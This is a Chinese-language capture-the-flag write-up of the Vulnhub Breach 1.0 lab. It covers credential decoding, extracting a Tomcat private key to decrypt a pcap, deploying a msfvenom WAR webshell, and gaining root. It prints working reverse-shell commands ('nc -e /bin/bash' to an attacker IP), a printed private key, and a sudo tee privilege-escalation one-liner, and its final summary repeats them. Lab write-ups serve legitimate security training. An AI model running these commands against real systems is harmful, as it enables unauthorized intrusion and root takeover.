Breach靶场

靶场环境:Breach1.0
攻击环境:Kali2 Linux
IP配置:将vmware主机模式IP段设置为192.168.110.0,攻击主机全部设置为主机模式。

下载Vulnhub的Breach1.0解压后导入VMware中。导入后我们需要把主机模式IP段设置为192.168.110.0,然后把攻击机全部设置为主机模式:



重启后攻击机和靶场就能通信了,貌似不重启也行的:(

工具

arp-scan
masscan
nmap
nikto
nc
firefox
burp suite
wireshark
msf

信息收集

我们使用arp-scan来检测我们的目标IP,192.168.110.140就是我们的目标机器

现在我们使用nmap来扫描一下目标机器,192.168.110.140的端口情况,发现目标机器开了全部的端口不知道是什么情况,那就直接访问80端口,发现网站。

看到了网站,作为菜鸡一枚先上扫描器试试,就用kali自带的nikto,扫描一下80端口上的服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@kali# nikto -host 192.168.110.140 output 192.168.110.140_nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.110.140
+ Target Hostname:    192.168.110.140
+ Target Port:        80
+ Start Time:         2019-06-27 13:56:20 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 44a, size: 534a04f49139d, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /.gitignore: .gitignore file found. It is possible to grasp the directory structure.
+ 7916 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2019-06-27 13:57:29 (GMT8) (69 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested</pre>

找到一个images目录,访问看看有什么收获不,发现几张图片,不知道干嘛的

试试用strings打印图片中的字符,发现bill.png中有两个字符,分别为tEXtComment coffeestains目前不清楚干嘛的,先拿个小本本记一下

漏洞挖掘

翻翻网站源代码,发现一串很像base64编码的代码,Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo提取出来用burpsuite解码一下看看

经过两次的base64编码发现了一个账户名跟密码pgibbons:damnitfeel$goodtobeagang$ta

并且发现了一个initech.html,访问看看发现是一个CMS,那么上面解码出来的账户名跟密码应该就是这个吗CMS的登录账户跟密码啦,登录试试看,成功登录!


登录成功后发现有三封邮件,在第三方中发现说有一个文件.keystore,我们去把它下载下来

我们在其中搜索ssl发现一个ssl的下载链接并且是pcap包的,这里提示了一个用户名跟密码都是tomcat的情况,那么我们猜测应该存在一个tomcat的网站,且这里说了这是一个红队的攻击流量包,(不知道理解的对不对)那么tomcat网站的连接不就在里面吗。我们把pcap包下载下来用wireshark分析分析趴!但是很不幸,发现所有TCP流量包全部被加密了,我们想到之前下载过一个.keystore这个应该是tomcat 秘钥库文件,使用keytool密码tomcat来检查它

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
root@kali:~# keytool -list -v -keystore keystore
输入密钥库口令:  
密钥库类型: JKS
密钥库提供方: SUN

您的密钥库包含 1 个条目

别名: tomcat
创建日期: 2016年5月21日
条目类型: PrivateKeyEntry
证书链长度: 1
证书[1]:
所有者: CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
发布者: CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
序列号: 60856e88
生效时间: Sat May 21 01:51:07 CST 2016, 失效时间: Fri Aug 19 01:51:07 CST 2016
证书指纹:
	 SHA1: D5:D2:49:C3:69:93:CC:E5:39:A9:DE:5C:91:DC:F1:26:A6:40:46:53
	 SHA256: F0:4A:E8:7F:52:C1:78:B4:14:2B:4D:D9:1A:34:31:F7:19:0A:29:F6:0C:85:00:0B:58:3A:37:20:6C:7E:E6:31
签名算法名称: SHA256withRSA
主体公共密钥算法: 2048 位 RSA 密钥
版本: 3

扩展: 

#1: ObjectId: 2.5.29.14 Criticality=false
SubjectKeyIdentifier [
KeyIdentifier [
0000: 47 6B A3 37 ED A5 1F 0A   0D 61 CA AA 17 9C F4 8C  Gk.7.....a......
0010: 10 64 87 DF                                        .d..
]
]



*******************************************
*******************************************



Warning:
JKS 密钥库使用专用格式。建议使用 "keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12" 迁移到行业标准格式 PKCS12。

然后尝试在keystore中提取私钥

1
2
3
4
5
6
7
8
root@kali:~# keytool -v -importkeystore -srckeystore keystore -srcalias tomcat -destkeystore myp12file.p12 -deststoretype PKCS12
正在将密钥库 keystore 导入到 myp12file.p12...
输入目标密钥库口令:  
再次输入新口令: 
输入源密钥库口令:  
[正在存储myp12file.p12]
root@kali:~# ls
公共  模板  视频  图片  文档  下载  音乐  桌面  core  keystore  myp12file.p12

检查私钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
root@kali:~# openssl pkcs12 -in myp12file.p12 -nocerts -nodes
Enter Import Password:
Bag Attributes
    friendlyName: tomcat
    localKeyID: 54 69 6D 65 20 31 35 36 31 36 32 37 37 33 35 30 34 38 
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQCjJXnELHvCEyTT
ZW/cJb7sFuwIUy5l5DkBXD9hBgRtpUSIv9he5RbJQwGuwyw5URbm3pa7z1eoRjFW
HLMVzKYte6AyyjUoWcc/Fs9fiu83+F0G36JmmFcxLFivVQwCHKhrajUc15i/XtCr
ExEDNL0igM8YnCPq4J9lXrXUanLltR464F7cJdLbkqHiqRvoFiOQi9e3CIZ86uoY
UNBupj2/njMFRuB7dEoeaQ/otHZIgCgjbP76I+/xyL/RkGxYuU0e1tpQiLxTi7kF
nJ1Rd55Gd+DvzuBiI9F+fxa4+TSQvRvQEzJIKowbPw6h82Cd66yFju8c2AKiaDie
F+AqVim3AgMBAAECggEBAIr2Ssdr1GY0hDODvUnY5MyXoahdobGsOVoNRvbPd0ol
cUDBl/0MSOJZLr+7Apo3lbhEdEO4kkOEtlVQ0MGKtSkcmhFo5updvjbgqPYKk0Qr
SqGmLuAQdoQt78Q4Pqg13MbRijfs8/BdRIPTE7SVYVxYNw4RQQ65EUv45gvuN7ur
shV5WSHVaN5QyUHyOTKcvFuBqxb9Mfo2NtRGZCG2QuG8V/C+k2k8+Q+n2wDaOXw8
sIWKVMHngOMcW1OBnM3ac/bTeI2+LI5cMsBZqYlLmkH1AOlnCgpH7389NbRQQJSo
sExX51v5r2mmI1JdzszwQYqRfH7+nugDRjBEN2ztqFECgYEA4eBiLFP9MeLhjti8
PDElSG4MVf/I9WXfLDU79hev7npRw8LE0rzPgawXOL8NhTbp8/X1D071bGaA3rCU
oBEEPclXlSwXHroZVjJALDhaPrIfFT6gBXlb9wAYSzWYED4LKXDuddVChrTo4Lmx
XaHb/KM7kpPuUWr+xccEEuNJBnMCgYEAuOduxGz2Ecd+nwATsZpjgG5/SwLL/rd0
TEMNQbB/XUIOI8mZpw5Dn1y71qCijk/A+oVzohc6Dspso4oXLMy0b+HCFPTKuGgg
Hf8QV5YbDg0urH8KNNEEH7Dx/C6cp6vVAcj6eQ2wOwW62yVY8gy2elWH0gte1BXl
hHiKIaLueq0CgYEAoAwi4+/7Ny7gzhvKfQgBt+mqOgGM/jzZvnRV8VDlayAm8YP/
fKcmjWZH6gCN7vdzHFcJ9nfnNJEI/UG3fhewnqscsOlV1ILe0xG2IN8pKsWBescu
EdLlFAZwMFJgVhnwRMPtY3bhtZtYa2uIPqUiwEdVPc4uDmi276LNwyhjJPsCgYA7
ANcO5TpMiB12vX6LURnpVNlX5WeVO5Nn9omXaavq5XY/o0hdz6ZyhxQFtDLLONX6
23T/x2umZp/uO9WTXStC/IaDS24ZFFkTWV4spOCzRi+bqdpm6j/noP5HG9SviJyr
Oif7Uwvmebibz7onWzkrpnl15Fz5Tpd0A0cI3sY87QKBgQDLZ9pl505OMHOyY6Xr
geszoeaj4cQrRF5MO2+ad81LT3yoLjZyARaJJMEAE7FZxPascemlg9KR3JPnevIU
3RdMGHX75yr92Sd8lNQvSO6RWUuRnc889xN1YrpPx5G1VppIFqTrcB0gAiREkeUA
pHiPhbocjixKJz9xx+pG0jDkrg==
-----END PRIVATE KEY-----

将私钥导入Wrieshark,然后重新导入_SSL_test_phase1.pcap

这样就可以看到解密后的数据,我们发现了tomcat的后台地址https://192.168.110.140:8443/_M@nag3Me/html

然后我们去追踪一下这条GET请求的HTTP流,找到了一个Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC这个就是tomcat登陆的密码base64编码了

用burpsuite,base64解码一下得到用户名:tomcat密码:Tt\5D8F(#!*u=G)4m7zB

注意:这里我无法通过firefox直接加载页面,其他浏览器也无法加载!但是当我burp proxy用作代理时,我能够在firefox中添加异常来访问tomcat页面。其他浏览器也可用此方法。

获取shell

根据上面的前两行,登录URL应该是https://192.168.110.140:8443/_M@nag3Me/html登录tomcat后台

部署war包getsehll,本来想,因为根据说明这里每隔三分钟就会有一个脚本对文件进行清理,所有我们需要反弹shell

shell中执行反弹shell命令
nc -e /bin/bash 192.168.110.128 19888
kali中监听,我们就收到反弹回来的shell啦
nc -lvvp -p 19888

当然还可以用msfvenom生成的jsp马,通过tomcat后台上传后在kali开监听也可以啦!

用如下命令生成一个WAR的webshell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f war > shell.war
然后设置msfconsole为监听并在触发上传的webshell后就会返回反向sehll

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set Payload java/jsp_shell_reverse_tcp
Payload => java/jsp_shell_reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set lhost 192.168.110.128
lhost => 192.168.110.128
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.110.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.110.128:4444 
[*] Command shell session 1 opened (192.168.110.128:4444 -> 192.168.110.140:36310) at 2019-07-01 00:19:08 +0800

id
uid=104(tomcat6) gid=112(tomcat6) groups=112(tomcat6)

查看当前系统用户,找id为1000以后的用户cat /etc/passwd
我们发现有两个值得关注用户分别是miltonblumbergh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
[*] Command shell session 2 opened (192.168.110.128:4444 -> 192.168.110.140:36312) at 2019-07-01 00:30:32 +0800

id
uid=104(tomcat6) gid=112(tomcat6) groups=112(tomcat6)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
tomcat6:x:104:112::/usr/share/tomcat6:/bin/false
colord:x:105:114:colord colour management daemon,,,:/var/lib/colord:/bin/false
mysql:x:106:116:MySQL Server,,,:/nonexistent:/bin/false
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash

提升权限

从之前的笔记我们有记录,我们在bill.png中发现一个字符串coffeestains很像一个密码啦,现在我得到了比尔的帐户名称blumbergh
现在sublumbergh的密码coffeestains

注意:这里直接用su是不行的,因为无法执行su命令,显示需要一个终端,遇到这个问题,通过Python解决:
python -c 'import pty;pty.spawn("/bin/bash")'

1
2
3
4
5
6
7
8
9
10
11
id
uid=104(tomcat6) gid=112(tomcat6) groups=112(tomcat6)
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat6@Breach:/home$ su blumbergh
su blumbergh
Password: coffeestains

blumbergh@Breach:/home$ id
id
uid=1001(blumbergh) gid=1001(blumbergh) groups=1001(blumbergh)
blumbergh@Breach:/home$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
blumbergh@Breach:/home$ cd ~
cd ~
blumbergh@Breach:~$ ls -al
ls -al
total 28
drwxr-xr-x 3 blumbergh blumbergh 4096 Jun 12  2016 .
drwxr-xr-x 4 root      root      4096 Jun  4  2016 ..
-rw------- 1 blumbergh blumbergh   61 Jun 12  2016 .bash_history
-rw-r--r-- 1 blumbergh blumbergh  220 Jun  4  2016 .bash_logout
-rw-r--r-- 1 blumbergh blumbergh 3637 Jun  4  2016 .bashrc
drwx------ 2 blumbergh blumbergh 4096 Jun  6  2016 .cache
-rw-r--r-- 1 blumbergh blumbergh  675 Jun  4  2016 .profile
blumbergh@Breach:~$ cat .bash_history
cat .bash_history
clear
logoff
logout
exit
cd /usr/share/cleanup
cat tidyup.sh
blumbergh@Breach:~$ locate tidyup.sh
locate tidyup.sh
/usr/share/cleanup/tidyup.sh
blumbergh@Breach:~$ ls -al /usr/share/cleanup/tidyup.sh
ls -al /usr/share/cleanup/tidyup.sh
-rwxr-xr-x 1 root root 289 Jun 12  2016 /usr/share/cleanup/tidyup.sh
blumbergh@Breach:~$ cat /usr/share/cleanup/tidyup.sh
cat /usr/share/cleanup/tidyup.sh
#!/bin/bash

#Hacker Evasion Script 
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.

cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf
blumbergh@Breach:~$ sudo -l
sudo -l
Matching Defaults entries for blumbergh on Breach:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User blumbergh may run the following commands on Breach:
    (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
blumbergh@Breach:~$

反弹ROOT,获取FLAG

这里我们知道tidyup.sh脚本将每3分钟自动运行一次,并blumbergh获得ROOT权限以运行命令/usr/bin/tee /usr/share/cleanup/tidyup.sh该命令将能够将tidyup.sh脚本修改为恶意shell。

设置nc为侦听本地端口7777后,我运行以下命令来修改tidyup.sh脚本以包含恶意代码:
echo "nc -e /bin/bash 192.168.110.128 7777" | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

1
2
3
4
blumbergh@Breach:~$ echo "nc -e /bin/bash 192.168.110.128 7777" | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
tee /usr/share/cleanup/tidyup.sh0.128 7777" | sudo /usr/bin/ 
nc -e /bin/bash 192.168.110.128 7777
blumbergh@Breach:~$

监听7777端口
nc -lvnp 7777
稍等片刻就可以看到得到ROOT用户!然后用ls -la看看都有些什么东西,很明显看到了flag的标识,我们最终的目的就是它cat .flag.txtojbk游戏通关!
27

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root@kali:~# nc -lvnp 7777
listening on [any] 7777 ...
connect to [192.168.110.128] from (UNKNOWN) [192.168.110.140] 51528
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/root
python -c 'import pty;pty.spawn("/bin/bash")'
root@Breach:~# ls -la
ls -la
total 60
drwx------  4 root root  4096 Jun 12  2016 .
drwxr-xr-x 22 root root  4096 Jun  4  2016 ..
-rw-------  1 root root   115 Jun 12  2016 .bash_history
-rw-r--r--  1 root root  3106 Feb 19  2014 .bashrc
drwx------  2 root root  4096 Jun  6  2016 .cache
-rw-r--r--  1 root root   840 Jun 11  2016 .flag.txt
-rw-r--r--  1 root root 23792 Jun  4  2016 flair.jpg
-rw-r--r--  1 root root   140 Feb 19  2014 .profile
drwxr-xr-x  2 root root  4096 Jun  5  2016 .rpmdb
-rw-r--r--  1 root root    66 Jun  4  2016 .selected_editor
root@Breach:~# cat .flag.txt
cat .flag.txt
-----------------------------------------------------------------------------------

______                     _     __   _____      _____ _          _____          _ 
| ___ \                   | |   /  | |  _  |    |_   _| |        |  ___|        | |
| |_/ /_ __ ___  __ _  ___| |__ `| | | |/' |______| | | |__   ___| |__ _ __   __| |
| ___ \ '__/ _ \/ _` |/ __| '_ \ | | |  /| |______| | | '_ \ / _ \  __| '_ \ / _` |
| |_/ / | |  __/ (_| | (__| | | || |_\ |_/ /      | | | | | |  __/ |__| | | | (_| |
\____/|_|  \___|\__,_|\___|_| |_\___(_)___/       \_/ |_| |_|\___\____/_| |_|\__,_|


-----------------------------------------------------------------------------------
Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!

Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.

汇总:

1.keystore是存储公私密码的一种文件格式

2.keytool

1
2
3
4
root@kali:~##查看keystore这个密钥库里面的所有证书
root@kali:~# keytool -list -v -keystore keystore
root@kali:~##从密钥库导出.p12证书
root@kali:~# keytool -v -importkeystore -srckeystore keystore -srcalias tomcat -destkeystore myp12file.p12 -deststoretype PKCS12

3.火狐访问tls

进入about:config并添加字符串security.tls.insecure_fallback_hosts 192.168.110.140
代理所有协议访问8080

4.生成木马

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f war > shell.war

5.python解决无法su

python -c 'import pty;pty.spawn("/bin/bash")'

6.用tee进行提权

echo "nc -e /bin/bash 192.168.110.128 7777" | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh